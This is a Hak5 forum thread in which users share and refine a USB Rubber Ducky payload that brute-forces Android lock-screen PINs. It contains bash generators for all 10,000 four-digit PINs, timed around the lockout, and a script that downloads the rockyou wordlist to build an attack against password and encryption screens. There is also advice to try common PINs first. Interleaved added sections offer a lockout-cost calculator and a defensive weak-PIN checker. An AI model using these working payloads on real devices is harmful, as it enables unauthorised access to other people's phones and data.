Darren Kitchen

[Payload] Android Brute Force 4-digit PIN

62 posts in this topic

I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.


I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4-digit PIN and the default of 5 tries followed by a 30-second timeout you're looking at a best-case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digits, but that would take 166 hours. 10 digits would take 1902.2 years. ;-)


```bash
echo DELAY 5000 > android_brute-force_0000-9999.txt
echo {0000..9999} | xargs -n 1 echo STRING \
  | sed '0~5 s/$/\nWAIT/g' \
  | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' \
  | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' \
  >> android_brute-force_0000-9999.txt
```

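Darren's 16.6 hour figure is simply 10000 PINs at 5 tries per 30-second lockout; the escalating-lockout and wipe-after-N ideas come up in the replies. This added calculator (mine, not code from the thread) puts those policies side by side so the cost of each can be compared; its doubling-lockout and wipe-after-10 parameters are constructed for comparison, not Android's actual settings.

```python
"""Worst-case cost of exhausting a numeric PIN space under different lockout
policies.  Added example for this thread, not part of the payload above; the
escalating and wipe-after-N policy parameters are constructed for comparison,
not Android's actual settings."""

SECONDS_PER_HOUR = 3600
SECONDS_PER_YEAR = 365 * 24 * 3600


def fixed_lockout_seconds(digits, tries_per_window, lockout_s):
    """Device allows `tries_per_window` guesses, then pauses `lockout_s`
    seconds, and repeats that forever (the 5 tries / 30 s the thread saw).
    Keystroke time is ignored, so this is the attacker's best case."""
    windows = 10 ** digits // tries_per_window
    return windows * lockout_s


def escalating_lockout_seconds(digits, tries_per_window, base_s, cap_s):
    """Same, but the pause doubles after every window until it reaches
    `cap_s`.  The doubling phase is walked explicitly (only about
    log2(cap/base) windows); the rest is closed-form at the cap."""
    windows = 10 ** digits // tries_per_window
    total, wait, done = 0, base_s, 0
    while done < windows and wait < cap_s:
        total += wait
        wait *= 2
        done += 1
    return total + (windows - done) * cap_s


def success_chance_before_wipe(digits, max_attempts):
    """Chance that a guesser with no knowledge of the PIN (uniformly chosen)
    gets in before a wipe-after-N policy ends the attempt."""
    return min(max_attempts, 10 ** digits) / 10 ** digits


if __name__ == "__main__":
    for d in (4, 5, 10):
        fixed = fixed_lockout_seconds(d, 5, 30)
        esc = escalating_lockout_seconds(d, 5, 30, SECONDS_PER_HOUR)
        print(f"{d}-digit PIN: fixed 5 tries/30 s -> {fixed / SECONDS_PER_HOUR:,.1f} h"
              f" ({fixed / SECONDS_PER_YEAR:,.1f} y); doubling to a 1 h cap ->"
              f" {esc / SECONDS_PER_YEAR:,.1f} y")
    print(f"wipe after 10 tries, 4-digit PIN: "
          f"{success_chance_before_wipe(4, 10):.1%} chance of success")
```

The fixed-window numbers reproduce the thread's 16.6 h / 166 h / ~1900 y; the same 4-digit space behind a lockout that doubles to a one-hour cap takes months, and a wipe after 10 tries leaves a blind guesser a 0.1% chance.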

Darren Kitchen... once again... kicks ass and is like, "Whatevs".

Keep on rockin @Darren!


I sent you a message elsewhere, but figured it would fit here as well.

Does this require ADB to be enabled?


No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loves HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin-to-USB adapter.


Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently I only have the dev Teensy; I was one of the lucky ones) next week when I get paid... along with other HakShop goodies :D.


Would this not also be effective on the new Windows 8, where people have the option to replace their sign-in password with a PIN? :)


I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot!


I am running Cygwin and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

```text
C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Users\UserName\Desktop

07/07/2012  01:03 AM               165 Android Paths.txt
08/30/2012  08:00 PM                50 Android SDK Path.txt
12/09/2012  02:26 PM                63 android_brute-force_0000-9999.txt
               3 File(s)            278 bytes
               0 Dir(s)  831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER

C:\Users\UserName\Desktop>
```

Edited by overwraith

So when I plug the Rubber Ducky into my phone it doesn't do anything at all. The light doesn't light up or anything. But when I plug it into my computer I see the inject.bin file and the LEDs on the duck light up. Any ideas?


To adapt Darren's simple script to generate android.txt on OS X, you need MacPorts installed and you need to install gsed (GNU sed), as GNU sed is slightly different to OS X's default BSD sed.

```bash
port install gsed
```

then:

```bash
echo DELAY 5000 > android_brute-force_0000-9999.txt
echo {0000..9999} | xargs -n 1 echo STRING \
  | gsed '0~5 s/$/\nWAIT/g' \
  | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' \
  | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' \
  >> android_brute-force_0000-9999.txt
```

Not sure what's going wrong with Cygwin?


I created a script to generate pretty much the same output using only bash loops/conditions.


```bash
#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}; do
    count=$((count+1))
    echo "STRING $pin"
    # After every other pin, do this
    if [ $((count % 2)) -eq 0 ]; then
        echo "DELAY 1000"
        echo "ENTER"
        echo "ENTER"
    fi
    # After 5 pins, do this
    if [ $((count % 5)) -eq 0 ]; then
        for (( delay=0; delay<4; delay++ )); do
            echo "DELAY 5000"
            echo "ENTER"
        done
    fi
done
```


You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.

Most common PINs would be any combinations with all the same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try those first, then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't want to remember more than two numbers.

Just my two cents.


It is kind of odd they didn't lock down the device after a certain number of tries, as pattern lock does that after 20 tries.

And once it gets locked down you'll need your Gmail password to unlock. (Which also sort of fails as well, because a reboot resets the counter.)

Edited by Kag

Hello everybody,

I must say that I am surprised that no one (only Totu) suggested using a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to brute-force your way into a device with a PIN you should really use that list, instead of a generated one.

Here is the study:

http://www.datagenet...september32012/

and here are the first 10 PINs I would try:

1234
1111
0000
1212
7777
1004
2000
4444
2222
6969

1 in 4 chance of hacking the device in under a minute!

What do you say?

Edited by iamnoxtras
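Totu's point about patterned PINs and the DataGenetics top ten above are exactly the input a defender wants: a policy that refuses those PINs when the user sets one. An added example of such a check (mine, not from the thread), using the ten PINs quoted in the post as its deny-list and assuming a minimum length of four digits:

```python
"""Lock-screen PIN policy check that rejects the weak patterns discussed in
this thread (repeated digits, 1212-style repeats, runs such as 1234/4321)
plus a deny-list of the most common PINs.  Added example, not from the
thread; the minimum length of four digits is an assumption."""

import re

# The ten most common PINs quoted in the post above (from the DataGenetics study).
COMMON_PINS = frozenset({"1234", "1111", "0000", "1212", "7777",
                         "1004", "2000", "4444", "2222", "6969"})


def weak_pin_reason(pin):
    """Return why `pin` is weak, or None when it passes every check."""
    if not re.fullmatch(r"\d{4,}", pin):
        return "must be at least four digits"
    if pin in COMMON_PINS:
        return "on the common-PIN deny list"
    if len(set(pin)) == 1:
        return "all digits identical"
    half = len(pin) // 2
    if len(pin) % 2 == 0 and pin[:half] == pin[half:]:
        return "repeated pattern (e.g. 2323)"
    # Consecutive differences of +1 (1234) or -1 (4321) everywhere = a run.
    digits = [int(c) for c in pin]
    steps = {b - a for a, b in zip(digits, digits[1:])}
    if steps in ({1}, {-1}):
        return "ascending or descending run (e.g. 4321)"
    return None


def is_acceptable_pin(pin):
    """True when `pin` triggers none of the weak-pattern checks."""
    return weak_pin_reason(pin) is None


if __name__ == "__main__":
    for candidate in ("1234", "3333", "2323", "5678", "8305", "12"):
        print(candidate, "->", weak_pin_reason(candidate) or "OK")
```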

My password is....
1
2
4
4
5
The same one on my luggage...


I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the Cygwin bin directory in my path variable. Have to use the Cygwin prompt provided with their software.


Another good thing to do would be to download the rockyou password list from SkullSecurity. Take like the top 5000 out of it, as it is already sorted from most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5-passwords-then-wait limiter.

** Edit **

Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.


```bash
#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
else
    echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
    PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
else
    echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
    PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
else
    echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:$wgetdir
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 rockyou.txt.bz2   # the original read "bunzip", which is not a command
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt
head -5000 rockyou.txt | sed -e 's/^/STRING /' \
  | sed '0~5 s/$/\nWAIT/g' \
  | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' \
  | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' \
  >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
```

Edited by CaptainHooligan

My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number...


Will it continue to go deep into the brute forcing even with a different pin lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of touchwiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout?


It's not based on the layout of the interface. The payload is based on the manual entry of the pass code by the keyboard, i.e. literally pressing 1-2-3-4. As long as the new models support a USB keyboard by default, then I can't see any reason why it wouldn't work.


Hi All,

I have a Motorola ME863 cell phone and after a few Xmas drinks was a prat and changed my 4-digit pass code ....and yup you guessed it ...promptly forgot the damn thing.

Is there anyone in the UK southeast / Berks/Bucks/ London area that can help me fix without having to do a factory reset ?

Many thanks in advance for all and any help

Rgds

JD


Just to add, it is the Chinese version (purchased August 2012) and not the USA version, so the Gmail backdoor does not work, as China blocks Gmail, Facebook etc.


If it has USB keyboard support, get yourself a ducky or a Teensy board, and brute-force it. If it doesn't support USB keyboard, then you're kinda stuck. (As far as I know, anyway...)

